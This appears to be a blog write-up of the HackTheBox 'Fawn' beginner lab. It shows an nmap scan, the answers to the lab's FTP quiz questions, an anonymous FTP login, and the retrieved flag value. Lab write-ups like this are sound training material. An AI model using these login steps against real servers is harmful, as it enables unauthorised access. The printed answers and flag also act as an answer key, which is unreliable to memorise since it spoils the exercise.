Fawn by HackTheBox is a really nice second Challenge in Tier 0 of the challenges. In today’s writeup we are going to see how we can solve this challenge in a comprehensive way.
If you want video solution the visit the following video for English Version
And in Hindi Version(हिंदी में)
Now let’s continue our Writeup
Fire up your terminal and scan the ip address
assigned to you
wesecure1337@kali:~$ nmap -sV {target_ip}
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 10:16 IST
Nmap scan report for {target_ip}
Host is up (0.29s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: UnixService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.16 seconds
As you can clearly see that ftp
is open on port 21
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
As we know file transfer protocol
in short is known as ftp
TASK 1
What does the 3-letter acronym FTP stand for?
File Transfer Protocol
From our initial scan using nmap
we know that ftp
is running on port 21
TASK 2
Which port does the FTP service listen on usually?
21
To secure ftp
,secure file transfer protocol (sftp)
has been introduced.
TASK 3
What acronym is used for the secure version of FTP?
sftp
It is well know that ping
is used to send ICMP echo request to host to test our connection like
wesecure1337@kali:~$ ping google.com
PING google.com (142.250.194.78) 56(84) bytes of data.
64 bytes from del12s03-in-f14.1e100.net (142.250.194.78): icmp_seq=1 ttl=116 time=46.2 ms
64 bytes from del12s03-in-f14.1e100.net (142.250.194.78): icmp_seq=2 ttl=116 time=47.7 ms
64 bytes from del12s03-in-f14.1e100.net (142.250.194.78): icmp_seq=3 ttl=116 time=65.0 ms
64 bytes from del12s03-in-f14.1e100.net (142.250.194.78): icmp_seq=4 ttl=116 time=50.8 ms--- google.com ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 46.156/52.408/64.988/7.450 ms
This brings us to the answer of TASK 4
TASK 4
What is the command we can use to send an ICMP echo request to test our connection to the target?
ping
From our initial scan we know that
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
So the scan clearly shows the version of ftp used
TASK 5
From your scans, what version is FTP running on the target?
vsftpd 3.0.3
Looking at the scan result we can see the OS type
TASK 6
From your scans, what OS type is running on the target?
Unix
In general, if you want to see the help menu of any tool just type the toolname -h
or toolname --help
like
wesecure1337@kali:~$ ftp -h
This brings us to our answer
TASK 7
What is the command we need to run in order to display the 'ftp' client help menu?
ftp -h
Using anonymous
as username and password on the ftp server one can login without having an account
TASK 8
What is username that is used over FTP when you want to log in without having an account?
anonymous
Now let’s login to the target system using ftp
wesecure1337@kali:~$ ftp {target_ip}
Connected to target_ip.
220 (vsFTPd 3.0.3)
Name (target_ip:wesecure1337): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
As you can see we have successfully logged into the server witout having account using anonymous
as both username
and password
Now to get the flag, follow the shown steps
ftp> ls
229 Entering Extended Passive Mode (|||13289|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||23875|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |*****************************************************************************************************************| 32 254.06 KiB/s 00:00 ETA
226 Transfer complete.
ftp> exitwesecure1337@kali:~$ cat flag.txt
035db21c881520061c53e0536e44f815
here get
is a commad used to get the files from ftp-server
to our machine
.
This bring to
SUBMIT FLAG
Submit root flag
035db21c881520061c53e0536e44f815
Finally, we have solved this challenge.
If you really enjoyed reading this writeup and feeling excited, do chekout our other writeups on related topic.
Let’s get connected
Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec
If you want to appreciate and support my work here you go…
Thanks for Reading!!!